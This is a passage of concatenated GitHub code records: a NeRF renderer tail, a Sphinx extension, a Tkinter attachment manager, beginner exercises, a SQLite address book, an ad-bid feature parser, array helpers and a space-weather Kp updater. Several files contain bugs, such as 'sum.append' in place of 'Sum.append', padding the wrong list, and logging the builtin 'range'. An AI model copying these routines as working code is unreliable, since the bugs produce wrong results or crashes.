torch.ones_like(rays_o[:, :1])],\r\n 1).to(device) # (H*W, 3)\r\n\r\n N_rays_all = rays.shape[0]\r\n rgb_rays, depth_rays_preds = [], []\r\n for chunk_idx in range(N_rays_all // args.chunk + int(N_rays_all % args.chunk > 0)):\r\n xyz_coarse_sampled, rays_o, rays_d, z_vals = ray_marcher(\r\n rays[chunk_idx * args.chunk:(chunk_idx + 1) * args.chunk],\r\n N_samples=args.N_samples, lindisp=args.use_disp)\r\n\r\n # Converting world coordinate to ndc coordinate\r\n H, W = imgs_source.shape[-2:]\r\n inv_scale = torch.tensor([W - 1, H - 1]).to(device)\r\n w2c_ref, intrinsic_ref = pose_source['w2cs'][0], pose_source['intrinsics'][0].clone()\r\n xyz_NDC = get_ndc_coordinate(w2c_ref, intrinsic_ref, xyz_coarse_sampled, inv_scale,\r\n near=near_far_source[0], far=near_far_source[1], pad=pad,\r\n lindisp=args.use_disp)\r\n\r\n # rendering\r\n rgb, disp, acc, depth_pred, alpha, extras = rendering(args, pose_source, xyz_coarse_sampled,\r\n xyz_NDC, z_vals, rays_o, rays_d,\r\n volume_feature, imgs_source,\r\n **render_kwargs_train)\r\n\r\n rgb, depth_pred = torch.clamp(rgb.cpu(), 0, 1.0).numpy(), depth_pred.cpu().numpy()\r\n rgb_rays.append(rgb)\r\n depth_rays_preds.append(depth_pred)\r\n\r\n depth_rays_preds = np.concatenate(depth_rays_preds).reshape(H, W)\r\n depth_rays_preds, _ = visualize_depth_numpy(depth_rays_preds, near_far_source)\r\n\r\n rgb_rays = np.concatenate(rgb_rays).reshape(H, W, 3)\r\n H_crop, W_crop = np.array(rgb_rays.shape[:2]) // 20\r\n rgb_rays = rgb_rays[H_crop:-H_crop, W_crop:-W_crop]\r\n depth_rays_preds = depth_rays_preds[H_crop:-H_crop, W_crop:-W_crop]\r\n img_vis = np.concatenate((rgb_rays * 255, depth_rays_preds), axis=1)\r\n\r\n frames.append(img_vis.astype('uint8'))\r\n\r\n imageio.mimwrite(f'{save_dir}/{args.video_name}{scene}.mov', np.stack(frames), fps=30, quality=10)\r\n os.system(f\"ffmpeg -i {save_dir}/{args.video_name}{scene}.mov -vcodec h264 -acodec mp2 {save_dir}/{args.video_name}{scene}.mp4\")\r\n os.system(f\"rm {save_dir}/{args.video_name}{scene}.mov\")\r\n\r\n","repo_name":"Yuchen-Song/DS-MVSNeRF","sub_path":"render_video.py","file_name":"render_video.py","file_ext":"py","file_size_in_byte":10482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19326058906","text":"import os\nfrom docutils import nodes\nfrom docutils.statemachine import ViewList\nfrom sphinx.util.docutils import SphinxDirective\nfrom sphinx.util.nodes import nested_parse_with_titles\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nwith open('{}/example.rst.tmpl'.format(dir_path), 'r') as f:\n lines = f.readlines()\n\n\ndef make_example(dir):\n path = '../../examples/{0}/{0}'.format(dir)\n rst = ViewList()\n line_no = 0\n for line in lines:\n line_no += 1\n line = line.format(path).rstrip()\n rst.append(line, 'example.rst', line_no)\n return rst\n\n\nclass ExampleDirective(SphinxDirective):\n has_content = True\n\n def run(self):\n dir = self.content[0]\n rst = make_example(dir)\n node = nodes.section()\n node.document = self.state.document\n nested_parse_with_titles(self.state, rst, node)\n return node.children\n\n\ndef setup(app):\n app.add_directive('example', ExampleDirective)\n return {\n 'parallel_read_safe': True,\n 'parallel_write_safe': True,\n }\n","repo_name":"udondan/iam-floyd","sub_path":"docs/source/extensions/example/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":524,"dataset":"github-code","pt":"53"}
+{"seq_id":"9662906338","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 14 13:22:32 2017\n\n@author: Kozmik\n\"\"\"\n\nimport DateTools as DT\nfrom os.path import abspath\nfrom os.path import exists\nfrom os.path import join\nfrom os import listdir\nfrom os import rename\nfrom os import mkdir\nfrom os import remove\nfrom os import rmdir\nfrom shutil import copy\nfrom subprocess import Popen\nimport PIL.Image as PI\nfrom PIL import ImageTk\nfrom tkinter import filedialog as filedialog\nfrom tkinter import messagebox as messagebox\nimport tkinter as tk\nimport tkinter.ttk as ttk\n\nclass AttachmentManager(tk.Frame):\n def __init__(self, master, controller, jobject, jentry, **kw):\n self.master = master\n self.controller = controller\n self.journal = jobject\n self.entry = jentry\n self.args = kw\n self.all_attachments = []\n self.dialog = None\n self.frame = None\n self.DELETE = None\n self.buttonlist = None\n self.delete_icon = None\n \n self.trashcan = join(self.args['homepath'], 'Resources\\\\Trash_Can-512.png')\n self.app_icon = join(self.args['homepath'], 'Resources\\\\web.ico')\n self.parentpath = join(self.args['homepath'], 'Attachments\\\\') \n try:\n mkdir(self.parentpath)\n except FileExistsError:\n pass\n self.temppath = self.parentpath + 'temp\\\\'\n self.currentpath = self.temppath\n# try:\n# mkdir(self.currentpath)\n# except FileExistsError:\n if exists(abspath(self.currentpath)):\n self.delete()\n \n ttk.Frame.__init__(self, self.master)\n self.NEW = ttk.Button(self, takefocus=0, style='UI.TButton', \n text='Add Attachment', \n command=self.askForAttachment)\n self.DISPLAY = ttk.Button(self, takefocus=0, style='UI.TButton', \n text='Display Attachments', \n command=self.displayAttachments, \n state=tk.DISABLED)\n self.NEW.pack(fill=tk.X)\n self.DISPLAY.pack(fill=tk.X)\n \n def updateGUI(self, jentry):\n \"\"\"Checks to see if the current JEntry has attachments and aligns variables, if so.\n Has exclusive control to generation of 'temp' folder.\"\"\"\n self.all_attachments = []\n if exists(self.temppath):\n self.current = self.temppath\n self.delete()\n self.DISPLAY.config(state=tk.DISABLED)\n self.entry = jentry\n date = self.entry.getDate()\n if date:\n attachments = self.entry.getAttachments()\n path = self.parentpath + DT.getDateFileStorageFormat(date) + '\\\\'\n filepath = exists(path)\n if not attachments and not filepath:\n self.currentpath = self.temppath\n mkdir(self.currentpath)\n elif attachments and not filepath:\n message = 'The directory for this journal entry could not be ' +\\\n 'located. Do you want the application to create a new ' +\\\n 'directory with a list of the missing files?'\n# if len(attachments) > 1:\n# message = 'The directory for this journal entry could ' +\\\n# 'not be located. The following attachments are missing: '\n# message += attachments[0] + '. Do you want to restore them?'\n# for item in range(1, len(attachments)):\n# message += ', ' + attachments[item]\n# else:\n# message = 'The directory for this journal entry could ' +\\\n# 'not be located. The following attachment is missing: '\n# message += attachments[0] + '. Do you want to restore it?'\n choice = messagebox.askyesno(title='Missing Directory', \n message=message)\n if choice:\n self.currentpath = path\n mkdir(self.currentpath)\n# self.askForAttachment()\n path = join(self.currentpath, 'Missing Files.txt')\n file = open(path, 'w+')\n for item in attachments:\n file.write(item + '\\n\\n')\n file.close()\n# message = 'The list of missing files can be found at:\\n\\n' +\\\n# self.currentpath\n# messagebox.showinfo()\n Popen(r'explorer /select, ' + '\"\"' + path + '\"\"')\n else:\n for item in attachments:\n self.entry.deleteAttachment(item)\n self.currentpath = self.temppath\n mkdir(self.currentpath)\n self.DISPLAY.config(state=tk.DISABLED)\n else:\n self.currentpath = path\n check = self.scanForAdditions()\n if check:\n attachments = self.entry.getAttachments()\n self.DISPLAY.config(state=tk.NORMAL)\n for filename in attachments:\n self.all_attachments.append(self.currentpath + \n filename)\n else:\n self.currentpath = self.temppath\n self.DISPLAY.config(state=tk.DISABLED)\n mkdir(self.currentpath) \n \n def addAttachment(self, pathtuple):\n for filepath in pathtuple:\n filepath = filepath.replace('/', '\\\\')\n if filepath not in self.all_attachments:\n self.all_attachments.append(filepath)\n copy(filepath, self.currentpath)\n# folder = listdir(self.currentpath)\n# entry = self.entry.getAttachments()\n# for file in folder:\n# if file not in entry:\n# self.entry.addAttachment(file)\n self.DISPLAY.config(state=tk.NORMAL)\n \n def askForAttachment(self):\n options = {}\n options['initialdir'] = self.currentpath\n options['parent'] = self.controller\n options['title'] = 'Select a file to add'\n items = filedialog.askopenfilenames(**options)\n if items:\n self.addAttachment(items)\n \n def scanForAdditions(self):\n \"\"\"[For later.] Allows manual addition of attachments that will be added \n to associated folder upon opening the JEntry.\"\"\"\n new = listdir(self.currentpath)\n old = self.entry.getAttachments()\n if old != new:\n for item in new:\n if item not in old:\n self.entry.addAttachment(item)\n return True\n else:\n return False\n# self.updateGUI(self.entry)\n \n def displayAttachments(self):\n self.buttonlist = []\n \n if self.all_attachments:\n self.dialog = tk.Toplevel(bg=self.args['bgcolor1'])\n self.dialog.title('Attachments')\n self.dialog.iconbitmap(self.app_icon)\n self.dialog.maxsize(width=self.dialog.winfo_screenwidth(), \n height=self.dialog.winfo_screenheight())\n self.dialog.minsize(width=250, height=70)\n \n self.frame = ttk.Frame(self.dialog)\n bottomframe = ttk.Frame(self.dialog)\n \n for filepath in self.all_attachments:\n path = abspath(filepath)\n command = r'explorer /select, ' + '\"\"' + path + '\"\"'\n button = ttk.Button(self.frame, style='UI.TButton', \n text=filepath.rsplit('\\\\', 1)[1], \n command=lambda c=command: Popen(c))\n self.buttonlist.append([button, \n tk.BooleanVar(self.frame, False, \n button.cget('text')), \n path])\n button.pack(expand=1, fill='x', pady=2)\n self.DELETE = ttk.Button(bottomframe, takefocus=0, \n style='Bold.UI.TButton', \n text='Delete', \n command=self.deleteAttachment)\n self.DELETE.pack(side='right', expand=True, fill='x')\n self.frame.pack(side='top')\n bottomframe.pack(side='top', pady=4)\n self.dialog.grab_set()\n \n self.dialog.protocol('WM_DELETE_WINDOW', self.destroyDialog)\n \n else:\n message = \"There are no attachments for this entry!\"\n messagebox.showinfo(title='Attachments', message=message)\n \n def deleteAttachment(self):\n for item in self.frame.pack_slaves():\n item.pack_forget()\n self.dialog.title('Delete')\n \n for item in self.buttonlist:\n checkbutton = ttk.Checkbutton(self.frame, \n text=item[0].cget('text'), \n var=item[1])\n checkbutton.pack(side=tk.TOP, expand=True, fill=tk.X, pady=2)\n \n w = self.DELETE.winfo_width()\n h = self.DELETE.winfo_height()\n if not self.delete_icon:\n# iconpath = self.parentpath.rsplit('\\\\Attachments',1)[0] + \\\n# '\\\\Resources\\\\Trash_Can-512.png'\n self.delete_icon = PI.open(self.trashcan)\n self.delete_icon.thumbnail((h-2,h-2))\n self.delete_icon = ImageTk.PhotoImage(self.delete_icon)\n self.DELETE.config(command=self.refreshDialog, text='', \n image=self.delete_icon, width=w)\n self.DELETE.pack()\n\n def delete(self):\n \"\"\"Deletes the folder associated with the entry.\"\"\"\n try:\n items = listdir(self.currentpath)\n for item in items:\n remove(self.currentpath + item)\n rmdir(self.currentpath)\n except FileNotFoundError:\n pass\n \n def refreshDialog(self):\n deletelist = []\n for i in range(len(self.buttonlist)):\n button = self.buttonlist[i]\n if button[1].get():\n deletelist.append(i)\n if deletelist:\n if len(deletelist) > 1:\n message = \"This will delete previously saved attachments from your journal storage.\"\\\n \" If you want to keep any of the attachments, press \\\"Cancel\\\" and copy \"\\\n \"them elsewhere. Then, return here to finish deleting.\\n\\n\"\\\n \"Are you sure you want to delete them?\"\n else:\n message = \"This will delete the selected attachment from your \"\\\n \"computer. If you want to keep the attachment, press \\\"Cancel\\\" \"\\\n \"and copy the attachment elsewhere. Then, return here to \"\\\n \"delete it.\\n\\n Are you sure you want to delete it?\"\n choice = messagebox.askokcancel(title='Are You Sure?', message=message)\n if choice:\n for d in deletelist:\n path = self.buttonlist[d][2]\n# filename = self.buttonlist[d][0].cget('text')\n# filepath = abspath(self.currentpath+filename)\n# if filepath == self.buttonlist[d][2]:\n# try:\n# remove(filepath)\n# except FileNotFoundError:\n# pass\n# if filepath in self.old_attachments:\n# self.old_attachments.remove(filepath)\n# else:\n# filepath = self.buttonlist[d][2]\n# if filepath in self.new_attachments:\n# self.new_attachments.remove(filepath)\n try:\n remove(path)\n except FileNotFoundError:\n pass\n self.entry.deleteAttachment(filename = \n self.buttonlist[d][0].cget('text'))\n self.all_attachments.remove(path)\n self.destroyDialog()\n \n def destroyDialog(self):\n self.dialog.destroy()\n self.dialog = None\n self.frame = None\n for item in self.buttonlist:\n item[0].destroy()\n self.buttonlist = None\n if not self.all_attachments:\n self.delete()\n self.updateGUI(self.entry)\n# self.DISPLAY.config(state=tk.DISABLED)\n# rmdir(self.currentpath)\n \n def clearGUI(self, jentry):\n self.entry = jentry\n self.all_attachments = []\n self.currentpath = self.temppath\n self.delete()\n# mkdir(self.currentpath)\n# self.new_attachments = []\n \n def save(self):\n \"\"\"Saves the attachments and renames the 'temp' folder to the date.\n Has exclusive control over generation of JEntry-associated folders.\n Assumes that the JEntry object already has a date\"\"\"\n src = self.temppath\n date = self.entry.getDate()\n dest = self.parentpath + DT.getDateFileStorageFormat(date)\n# tmp = False\n old = self.entry.getAttachments()\n# if not old:\n if exists(src):\n# tmp = True\n new = listdir(src)\n if new:\n for item in new:\n if item not in old:\n self.entry.addAttachment(item)\n rename(src, dest)\n else:\n folder = listdir(dest)\n for file in folder:\n if file not in old:\n self.entry.addAttachment(file)\n# self.delete()\n# src = self.currentpath\n# if new and tmp:\n \n# if self.all_attachments:\n# try:\n# mkdir(path)\n# except FileExistsError:\n# pass\n# for filepath in self.new_attachments:\n# copy(filepath, path)\n# f = filepath.rsplit('\\\\',1)[1]\n# self.entry.addAttachment(f)\n# tmp = self.entry.getAttachments()\n# self.old_attachments = []\n# for filename in tmp:\n# self.old_attachments.append(self.currentpath+filename) \n# self.new_attachments = []\n\n def clean(self):\n self.currentpath = self.temppath\n if exists(self.currentpath):\n check = listdir(self.currentpath)\n if check:\n message = 'There are files left in ' + self.currentpath + '. If you wish to '\\\n 'move them, do so before clicking \\\"OKAY\\\".'\n messagebox.showwarning(title='Unsaved files', message=message)\n self.delete()","repo_name":"kozmik-moore/kunnekted-jurnl","sub_path":"AttachmentTools.py","file_name":"AttachmentTools.py","file_ext":"py","file_size_in_byte":14922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70636061610","text":"#factorial\r\ndef fact(n):\r\n f=1\r\n for i in range(1,n+1):\r\n f*=i\r\n return f\r\n\r\nn=int(input())\r\nr=int(input())\r\n\r\nn_fact=fact(n)\r\nr_fact=fact(r)\r\nnr_fact=fact((n-r))\r\nc=n_fact//(r_fact*nr_fact)\r\nprint(c)\r\n\r\n #prime no\r\ndef isprime(n):\r\n for i in range(2,n):\r\n if n%i==0:\r\n break\r\n else:\r\n return True\r\n return False\r\n\r\nn=int(input())\r\na=isprime(n)\r\nif a:\r\n print(\"Prime\")\r\nelse:\r\n print(\"Not Prime\")\r\n\r\n#all prime no b/w 2 to n\r\nn=int(input())\r\nfor i in range(2,n+1):\r\n a=isprime(i)\r\n if a:\r\n print(i,\" Prime\")\r\n else:\r\n print(i,\" Not Prime\")\r\n\r\n\r\n#prime in range 2 to n\r\ndef isprimerange(n):\r\n for i in range(2,n+1):\r\n for j in range(2,i):\r\n if i%j==0:\r\n break\r\n else:\r\n print(i)\r\n\r\nn=int(input())\r\nisprimerange(n)\r\n\r\n\r\n#prime in range 2 to n\r\ndef isprime(n):\r\n for i in range(2,n):\r\n if n%i==0:\r\n break\r\n else:\r\n return True\r\n return False\r\n\r\ndef isprimerange(n):\r\n for i in range(2,n+1):\r\n a=isprime(i)\r\n if a:\r\n print(i)\r\n\r\nn=int(input())\r\nisprimerange(n)","repo_name":"AbhisheKumar1616/Introduction-to-Python","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"36424990103","text":"\"\"\" Python modules\n logging: logs\n geodesic: distance between 2 points\n\"\"\"\nimport logging\nimport sqlite3\nfrom geopy.distance import geodesic\n\n\nfrom src.db_connection import database_connection_cursor\n\nlogging.basicConfig(level=logging.INFO, filename=\"logs/db_connection.log\",\n format=\" %(asctime)s - %(levelname)s - %(message)s\")\n\n\n# Connecting database and receiving conn and cursor object\ndb_conn, db_curr = database_connection_cursor()\n\n\nclass Address:\n \"\"\"\n Address class for UserAddress\n \"\"\"\n def __init__(self, address_name=None, coordinates=None):\n self.address_name = address_name\n self.coordinates = coordinates\n\n def create_address(self):\n \"\"\"\n Method to create/add address into Database\n Error Convention:\n 1500: same address_name\n \"\"\"\n\n addrs = set()\n ids = self.get_address_ids()\n for addr in ids:\n addrs.add(addr[0])\n if self.address_name in addrs:\n return 1500\n\n del addrs\n\n query = f\"\"\" INSERT INTO address_book VALUES\n ('{self.address_name}','{self.coordinates}')\"\"\"\n\n try:\n logging.info(db_curr.execute(query))\n except sqlite3.Error as err:\n logging.error(err)\n\n self.commit()\n\n return True\n\n def delete_address(self, query_address_name):\n \"\"\"Method to delete a address in the DB by name\n \"\"\"\n addrs = set()\n ids = self.get_address_ids()\n\n for addr in ids:\n addrs.add(addr[0])\n\n if query_address_name not in addrs:\n return False\n del addrs\n\n query = f\"\"\"\n DELETE FROM address_book WHERE\n address_name ='{query_address_name}';\n \"\"\"\n try:\n db_curr.execute(query)\n self.commit()\n return True\n except sqlite3.Error as err:\n logging.error(err)\n\n def update_address(self):\n \"\"\"Method to update a address in the DB\n \"\"\"\n addrs = set()\n ids = self.get_address_ids()\n for addr in ids:\n addrs.add(addr[0])\n\n if self.address_name not in addrs:\n return 1500\n\n del addrs\n query = f\"\"\"\n UPDATE address_book\n SET coordinates = '{self.coordinates}'\n WHERE address_name = '{self.address_name}';\n \"\"\"\n\n try:\n logging.info(db_curr.execute(query))\n\n except sqlite3.Error as err:\n logging.error(err)\n\n self.commit()\n\n return True\n\n def get_address_in_range(self, rang, location):\n \"\"\"\n Method to get the addresses within the given distance\n and location from sqlite database\n\n \"\"\"\n location = location.split(\",\")\n latitude = float(location[0].strip())\n longitude = float(location[1].strip())\n\n point = (latitude, longitude)\n\n addresses_within_range = []\n all_addresses = self.get_address_ids()\n\n for address in all_addresses:\n address_point = address[1].split(\",\")\n address_point = (float(address_point[0]), float(address_point[1]))\n\n diff = geodesic(point, address_point)\n logging.info(f\"Location:{location}\")\n logging.info(f\"Address point: {address_point} -- \\\n Range:{range} -- Difference: {diff}\")\n\n if diff <= rang:\n addresses_within_range.append(address)\n\n return addresses_within_range\n\n @staticmethod\n def commit():\n \"\"\"\n Method to commit the changes done on the database\n\n \"\"\"\n db_conn.commit()\n\n @staticmethod\n def close():\n \"\"\"\n Method to close the database connection\n \"\"\"\n db_conn.close()\n\n @staticmethod\n def get_address_ids():\n \"\"\"\n Method to get all the address names present in the DB\n \"\"\"\n try:\n db_curr.execute(\"\"\"SELECT address_name, coordinates\n FROM address_book;\"\"\")\n rows = db_curr.fetchall()\n return rows\n except sqlite3.Error as err:\n logging.error(err)\n","repo_name":"mallik18/AddressBook","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31171169831","text":"def ficha(nome='', gol=0,):\n print( f'O jogador {nome} fez {gol} gol(s) no campeonato.')\n\n\nnomeJogador = str(input('Nome do jogador: '))\nnumGols = str(input('Número de gols: '))\nif numGols.isnumeric():\n numGols = int(numGols)\nelse:\n numGols = 0\nif nomeJogador.strip() == '':\n ficha(gol=numGols)\nelse:\n ficha(nomeJogador, numGols)\n","repo_name":"Nadirlene/Exercicios-python","sub_path":"Exerciciospython2/Função 02/e103.py","file_name":"e103.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6334152351","text":"\"\"\"\nDefine the method to parse variables \"bidderid\", \"verticalid\", \"bidfloor\", \"format\", \"product\", \"w\", and \"h\"\n\"\"\"\n\nimport Shared as sd\n\nformats_ = [16, 31, 9, 12, 14, 3, 2, 7, 5, 21, 8, 20, 15, 6, 22, 27, 25, 26, 30, 13, 23]\n\n# (\"w\", \"h\") is set to (-1, -1) to indicate missing banners\nbanners_ = [(300, 250), (728, 90), (160, 600), (320, 50), (300, 600), (970, 90), (468, 60), (234, 60),\n (13, 13), (12, 12), (17, 17), (18, 18), (10, 10), (300, 120), (16, 16), (250, 100), (19, 19), (320, 480),\n (250, 70), (0, 0), (450, 100), (21, 21), (20, 20), (400, 400), (300, 100), (-1, -1)]\n\n\ndef process(margin, entry, result, mode):\n \"\"\"\n Given a JSON object formatted by Extractor.py, parse variables \"bidderid\", \"verticalid\", \"bidfloor\", \"format\", \"product\", \"w\", and \"h\",\n and the results to the list of possible results.\n :param entry: the JSON object that represents one impression\n :param result: the list of possible results\n :return: None\n \"\"\"\n\n # Auction - Bidrequests - bidder id\n bidder_id = entry[\"bidderid\"]\n if bidder_id == 36: # Adjusting the index for DSP 36 since we ignore DSP 35 and 37\n bidder_id = 35\n sd.binarize(result, bidder_id-1, 35)\n\n # Auction - Bidrequests - vertical id\n sd.binarize(result, entry[\"verticalid\"]-1, 16)\n\n # Auction - Bidrequests - Impressions - bid Floor\n bid_floor = round(float(entry[\"bidfloor\"]), 2)\n\n if bid_floor-margin == 0:\n result.append(0)\n else:\n result.append(1)\n\n # If bid floor is to be parsed into binary format, create a boolean variable for every interval of size 0.5 from 0 to 28,\n # and according to the value of the bid floor, set the associated boolean variable to 1.\n # Otherwise, just record the value of bid floor.\n if mode == \"bin\":\n index = 0\n if bid_floor < 28:\n index = int(bid_floor*20)\n bid_floor_list = [0]*560\n bid_floor_list[index] = 1\n result.extend(bid_floor_list)\n else:\n result.append(bid_floor)\n\n # Determine if bid floor is a multiple of 0.05 or of 0.1\n for n in [20, 10]:\n bid_floor_tmp = n*bid_floor\n if bid_floor_tmp == int(bid_floor_tmp):\n result.append(1)\n else:\n result.append(0)\n\n # Determine if bid floor is greater than the values in thres_list\n index = 0\n thres_list = [1.5, 2, 2.5, 3, 28]\n for thres in thres_list:\n if bid_floor > thres:\n result.append(1)\n index += 1\n else:\n n = len(thres_list) - index\n result.extend([0]*n)\n break\n\n # Auction - Bidrequests - Impressions - format\n sd.binarize(result, formats_.index(entry[\"format\"]), len(formats_))\n\n # Auction - Bidrequests - Impressions - product\n sd.binarize(result, entry[\"product\"]-1, 6)\n\n # Auction - Bidrequests - Impressions - banner\n width = entry[\"w\"]\n height = entry[\"h\"]\n\n # Determine if banner belongs to any of the following types:\n # 1) h in (0, 200] and w in (0, 500]\n # 2) h in (0, 200] and w in (500, infinity)\n # 3) h in (200, infinity) and w in (0, 500]\n banner_cat = [0, 0, 0]\n if 0 < height <= 200:\n if 0 < width <= 500:\n banner_cat[0] = 1\n elif width > 500:\n banner_cat[1] = 1\n elif (height > 200) and (width <= 500):\n banner_cat[2] = 1\n\n sd.add_to_result(result, (width, height), banners_)\n result.extend(banner_cat)\n\n\ndef get_hearder():\n \"\"\"\n Return the names of features extracted in this section, and the number of variables used to represent each feature.\n :return: a list of tuples containing the feature names and the lengths of the corresponding features\n \"\"\"\n bidder_id = (\"bidder_id\", 35)\n vertical_id = (\"vertical_id\", 16)\n bid_floor = (\"bid_floor\", 9)\n format = (\"format\", len(formats_))\n product = (\"product\", 6)\n banner = (\"banner\", 3+len(banners_)+1)\n\n return [bidder_id, vertical_id, bid_floor, format, product, banner]","repo_name":"wlu673/gumgum","sub_path":"Preprocessing/Auction_BidRequests.py","file_name":"Auction_BidRequests.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"39486565186","text":"def Set_equal_dimensions_2_IQ(vect1,vect2):\n\t##this fuction adds 0 to the shorter array in order to \n\t## have same dimension in both arrays\n\tlen1 = len(vect1)\n\tlen2 = len(vect2)\n\tif(len1>len2):\n\t\tfor i in range(len1-len2):\n\t\t\tvect2.append(0)\n\tif(len2>len1):\n\t\tfor i in range(len2-len1):\n\t\t\tvect2.append(0)\n\n\treturn(vect1,vect2)\n\n\ndef operating_array(vect1,vect2,operation):\n\tif(operation==\"dot product\"):\n\t\tdotProduct=[]\n\t\tfor i in range(int(len(vect1))):\n\t\t\tdotProduct.append(vect1[i]*vect2[i])\n\t\treturn dotProduct\n\telif(operation==\"substraction\"):\n\t\tSubstraction=[]\n\t\tfor i in range(int(len(vect1))):\n\t\t\tSubstraction.append(vect1[i]-vect2[i])\n\t\treturn Substraction\n\telif(operation==\"sumation\"):\n\t\tSum=[]\n\t\tfor i in range(int(len(vect1))):\n\t\t\tsum.append(vect1[i]+vect2[i])\n\t\treturn Sum","repo_name":"bobinaman/SDR_NASA","sub_path":"Math_Functions.py","file_name":"Math_Functions.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9635325832","text":"#!/proj/sot/ska3/flight/bin/python\n\n#####################################################################################################\n# #\n# update_solor_wind_data.py: copy kp data and create a file to match in the required format #\n# #\n# author: t. isobe (tisobe@cfa.harvard.edu) #\n# #\n# last updae: Mar 16, 2021 #\n# #\n#####################################################################################################\n\nimport os\nimport sys\nimport re\nimport string\nimport math\nimport numpy\nimport time\nfrom datetime import datetime\nfrom time import gmtime, strftime, localtime\nimport Chandra.Time\n\npath = '/data/mta4/Space_Weather/house_keeping/dir_list'\n\nwith open(path, 'r') as f:\n data = [line.strip() for line in f.readlines()]\n\nfor ent in data:\n atemp = re.split(':', ent)\n var = atemp[1].strip()\n line = atemp[0].strip()\n exec(\"%s = %s\" %(var, line))\n#for writing out files in test directory\nif (os.getenv('TEST') == 'TEST'):\n os.system('mkdir -p TestOut')\n test_out = os.getcwd() + '/TestOut'\n\n#---------------------------------------------------------------------------------------\n#-- get_kp: copy kp data and create a file to match in the required format --\n#---------------------------------------------------------------------------------------\n\ndef get_kp():\n \"\"\"\n copy kp data and create a file to match in the required format\n input: none but read from: /data/mta4/proj/rac/ops/KP/k_index_data\n output: /solar_wind_data.txt\n \"\"\"\n#\n#--- find out the last update time\n#\n data_dir = kp_dir + 'Data/'\n\n datafilep = data_dir + '/solar_wind_data_past.txt'\n datafile = data_dir + '/solar_wind_data.txt'\n odata = read_data_file(datafilep)\n at = re.split('\\s+', odata[-1])\n otime = at[0] + ':' + at[1] + ':' + at[2] + ':' + at[3][0] \n otime = otime + at[3][1] + ':' + at[3][2] + at[3][3] + ':00'\n otime = datetime.strptime(otime, \"%Y:%m:%d:%H:%M:%S\").strftime(\"%Y:%j:%H:%M:%S\")\n otime = Chandra.Time.DateTime(otime).secs\n#\n#--- read kp data file\n#\n ifile = kp_dir + 'Data/k_index_data_past'\n data = read_data_file(ifile)\n#\n#--- find the part which are not in the data\n#\n line = ''\n for ent in data:\n atemp = re.split('\\s+', ent)\n ltime = float(atemp[0])\n l_time = ltime\n if ltime > otime:\n kval = atemp[1]\n \n ltime = Chandra.Time.DateTime(ltime).date\n mc = re.search('\\.', ltime)\n if mc is not None:\n btemp = re.split('\\.', ltime)\n ltime = btemp[0]\n \n ldate = datetime.strptime(ltime, '%Y:%j:%H:%M:%S').strftime(\"%Y %m %d %H%M\")\n \n line = line + ldate + '\\t\\t' + ldate + '\\t\\t' + kval + '\\t\\t\\t' \n line = line + ldate + '\\t\\t' + kval + '\\t\\t' + kval + '\\n'\n#\n#--- if there is new data, update\n#\n appendfile = datafilep\n #for writing out files in test directory\n if (os.getenv('TEST') == 'TEST'):\n appendfile = test_out + \"/\" + os.path.basename(appendfile)\n if line != '':\n fo = open(appendfile, 'a')\n fo.write(line)\n fo.close()\n\n cmd = 'cp -f ' + datafilep + ' ' + datafile\n os.system(cmd)\n else:\n exit(1)\n#\n#--- add predictive kp data file\n#\n ifile = kp_dir + 'Data/k_index_data'\n data = read_data_file(ifile)\n\n line = ''\n for ent in data:\n atemp = re.split('\\s+', ent)\n ltime = float(atemp[0])\n if ltime <= l_time:\n continue\n\n kval = atemp[1]\n \n ltime = Chandra.Time.DateTime(ltime).date\n mc = re.search('\\.', ltime)\n if mc is not None:\n btemp = re.split('\\.', ltime)\n ltime = btemp[0]\n \n ldate = datetime.strptime(ltime, '%Y:%j:%H:%M:%S').strftime(\"%Y %m %d %H%M\")\n \n line = line + ldate + '\\t\\t' + ldate + '\\t\\t' + kval + '\\t\\t\\t' \n line = line + ldate + '\\t\\t' + kval + '\\t\\t' + kval + '\\n'\n#\n#--- if there is new data, update\n#\n appendfile = datafile\n #for writing out files in test directory\n if (os.getenv('TEST') == 'TEST'):\n appendfile = test_out + \"/\" + os.path.basename(appendfile)\n if line != '':\n with open(appendfile, 'a') as fo:\n fo.write(line)\n\n#---------------------------------------------------------------------------------------\n#---------------------------------------------------------------------------------------\n#---------------------------------------------------------------------------------------\n\ndef read_data_file(ifile):\n\n with open(ifile, 'r') as f:\n data = [line.strip() for line in f.readlines()]\n\n return data\n\n#---------------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n\n get_kp()\n\n","repo_name":"chandra-mta/Space_Weather_New","sub_path":"KP/Scripts/update_solor_wind_data.py","file_name":"update_solor_wind_data.py","file_ext":"py","file_size_in_byte":5357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
